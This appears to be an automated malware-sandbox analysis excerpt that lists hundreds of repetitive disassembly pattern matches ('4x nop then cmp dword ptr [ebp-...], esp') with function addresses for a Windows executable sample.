                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00484331
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00484331
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004B63E5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_0041A3F7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_0041A3F7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_0041A3F7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 04h0_2_0041A3F7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004B0399
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004B0399
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004A23A5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004A23A5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp0_2_004B4458
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-000000A8h], esp0_2_004B4458
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-68h], esp0_2_004B4458
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp0_2_004B4458
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_004C445B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_004C445B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_004C445B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00442466
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 08h0_2_0047246B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 04h0_2_0047246B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_0049C406
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0047E42C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0047E42C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0049E4EB
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00470485
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_004B64B7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004AE511
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004C2521
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004C2521
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 08h0_2_004A8537
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 04h0_2_004A8537
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004805F0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004805F0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004805F0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004805F0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0044C5BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0044C5BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_004AA65D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004AA65D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_0049C606
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040461E
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004A0622
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_004AE63F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0043C6C7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_004BE6CD
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 04h0_2_004C26C6
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004806F0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004A2691
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00470699
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-48h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00486718
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0048A725
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0048A725
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0043C7F8
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0043C7F8
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_0049E790
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_0049E790
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_0046C7BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_0046C7BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_0046C7BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0046C7BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0046C7BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004BA852
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004BA852
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00490852
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00470859
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00478875
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0040E873
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_004B880D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0046A813
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0046A813
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0049C811
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0044681D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0048E812
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0048E812
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0048E812
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0046483C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0046483C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0046483C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0046483C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004128D5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004128D7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004C88D1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004C88D1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004C88D1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004828FE
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0044695A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_0044695A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00404964
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_004C2909
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0046090D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0046090D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0043C91D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_004529CC
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004809EB
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp0_2_004C49E0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004269F5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004269F5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004269F5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004509FE
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004509FE
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004B2A2D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0046AA2F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_0046AA2F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_0046AA2F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0046AA2F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0046AA2F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_00426AD7
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_00426AD7
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-18h], esp | 0_2_00426AD7
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_00426AD7
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_00426AD7
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_00426AD7
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_00490AEF
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_004BCA82
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], esp | 0_2_0049CAA2
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_0043CB4C
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0045AB63
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-10h], esp | 0_2_004A0B71
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_004A0B71
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-18h], esp | 0_2_004A0B71
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], esp | 0_2_0047CB06
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0041CB09
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-10h], esp | 0_2_004BAB25
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-10h], esp | 0_2_004BAB25
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_00446B2B
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], esp | 0_2_004B2BCA
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then add esp, 08h | 0_2_004A8BD4
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0041ABE8
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_0041ABE8
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-64h], esp | 0_2_0044298A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-60h], esp | 0_2_0044298A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-60h], esp | 0_2_0044298A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-60h], esp | 0_2_0044298A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-60h], esp | 0_2_0044298A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-64h], esp | 0_2_0044298A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-64h], esp | 0_2_0044298A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-3Ch], esp | 0_2_00404C42
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-3Ch], esp | 0_2_00404C4C
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-3Ch], esp | 0_2_00404C56
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-3Ch], esp | 0_2_00404C60
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then push edx | 0_2_0042EC66
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-3Ch], esp | 0_2_00404C24
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_004C4C21
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_004C4C21
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-3Ch], esp | 0_2_00404C2E
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-3Ch], esp | 0_2_00404C38
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-38h], esp | 0_2_00484C33
